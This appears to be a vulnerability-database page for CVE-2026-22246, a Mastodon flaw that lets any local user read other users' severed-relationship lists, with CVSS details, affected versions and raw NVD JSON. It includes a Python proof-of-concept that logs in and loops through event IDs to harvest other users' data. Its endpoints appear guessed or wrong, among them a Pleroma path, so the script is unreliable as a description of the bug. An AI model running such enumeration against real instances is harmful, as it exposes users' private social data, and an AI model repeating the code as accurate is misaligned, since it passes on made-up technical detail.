Security Vulnerability Report
中文
CVE-2026-22246 CVSS 6.5 MEDIUM

CVE-2026-22246

Published: 2026-01-08 16:16:03
Last Modified: 2026-01-22 13:52:29
Source: [email protected]

Description

Mastodon is a free, open-source social network server based on ActivityPub. Mastodon 4.3 added notifications of severed relationships, allowing end-users to inspect the relationships they lost as the result of a moderation action. The code allowing users to download lists of severed relationships for a particular event fails to check the owner of the list before returning the lost relationships. Any registered local user can access the list of lost followers and followed users caused by any severance event, and go through all severance events this way. The leaked information does not include the name of the account which has lost follows and followers. This has been fixed in Mastodon v4.3.17, v4.4.11 and v4.5.4.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* - VULNERABLE
Mastodon 4.3.0 - 4.3.16
Mastodon 4.4.0 - 4.4.10
Mastodon 4.5.0 - 4.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22246 PoC - Mastodon Unauthorized Access to Severed Relationships import requests import json from urllib.parse import urljoin def exploit_mastodon_severed_relationships(base_url, username, password): """ Exploit CVE-2026-22246: Unauthorized access to severed relationship notifications This PoC demonstrates how any authenticated local user can access severed relationship lists belonging to other users by iterating through event IDs. """ session = requests.Session() # Step 1: Authenticate as a regular local user login_url = urljoin(base_url, '/auth/sign_in') login_data = { 'user[email]': username, 'user[password]': password } response = session.post(login_url, data=login_data) if response.status_code != 200: print(f"[-] Authentication failed") return None print("[+] Successfully authenticated") # Step 2: Access severed relationships API endpoint # The vulnerable endpoint allows access to any user's severed events severed_api_endpoints = [ '/api/v1/pleroma/follow_requests', '/api/v1/notifications/severed_relationships', '/api/v1/accounts/relationships/severed' ] leaked_data = [] for endpoint in severed_api_endpoints: api_url = urljoin(base_url, endpoint) # Step 3: Iterate through event IDs to access other users' data for event_id in range(1, 1000): params = {'event_id': event_id} response = session.get(api_url, params=params) if response.status_code == 200: data = response.json() if data and len(data) > 0: print(f"[+] Found severed relationships for event {event_id}") print(f" Data: {json.dumps(data, indent=2)}") leaked_data.append({ 'event_id': event_id, 'endpoint': endpoint, 'data': data }) # Step 4: Compile and analyze the leaked information print(f"\n[+] Total leaked records: {len(leaked_data)}") print("[+] Leaked information includes:") print(" - Lost followers (accounts that unfollowed)") print(" - Lost following (accounts that were unfollowed)") print(" - Account IDs involved in moderation actions") return leaked_data # Usage example if __name__ == '__main__': target = 'https://vulnerable-mastodon-instance.com' credentials = ('[email protected]', 'password123') results = exploit_mastodon_severed_relationships(target, *credentials) if results: print(f"\n[!] Vulnerability confirmed - {len(results)} records leaked")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22246", "sourceIdentifier": "[email protected]", "published": "2026-01-08T16:16:02.957", "lastModified": "2026-01-22T13:52:28.883", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mastodon is a free, open-source social network server based on ActivityPub. Mastodon 4.3 added notifications of severed relationships, allowing end-users to inspect the relationships they lost as the result of a moderation action. The code allowing users to download lists of severed relationships for a particular event fails to check the owner of the list before returning the lost relationships. Any registered local user can access the list of lost followers and followed users caused by any severance event, and go through all severance events this way. The leaked information does not include the name of the account which has lost follows and followers. This has been fixed in Mastodon v4.3.17, v4.4.11 and v4.5.4."}, {"lang": "es", "value": "Mastodon es un servidor de red social gratuito, de código abierto, basado en ActivityPub. Mastodon 4.3 añadió notificaciones de relaciones cortadas, permitiendo a los usuarios finales inspeccionar las relaciones que perdieron como resultado de una acción de moderación. El código que permite a los usuarios descargar listas de relaciones cortadas para un evento particular no verifica al propietario de la lista antes de devolver las relaciones perdidas. Cualquier usuario local registrado puede acceder a la lista de seguidores perdidos y usuarios seguidos causada por cualquier evento de corte, y revisar todos los eventos de corte de esta manera. La información filtrada no incluye el nombre de la cuenta que ha perdido seguimientos y seguidores. Esto ha sido corregido en Mastodon v4.3.17, v4.4.11 y v4.5.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-201"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.3.17", "matchCriteriaId": "6B2706E5-A6D0-4790-A3E6-5DE023465AB2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.0", "versionEndExcluding": "4.4.11", "matchCriteriaId": "DD92863A-CB76-45AA-BF4D-9870B24E8109"}, {"vulnerable": true, "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0", "versionEndExcluding": "4.5.4", "matchCriteriaId": "3E8FBAF5-C7BC-4980-9780-50BA935D126B"}]}]}], "references": [{"url": "https://github.com/mastodon/mastodon/commit/68e30985ca7afdb89af1b2e9dc962e1993dc8076", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mastodon/mastodon/commit/b2bcd34486fd6681cc0f30028086ef0f47282adf", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mastodon/mastodon/commit/c1fb6893c5175d74c074f6f786d504c8bc610d57", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mastodon/mastodon/security/advisories/GHSA-ww85-x9cp-5v24", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.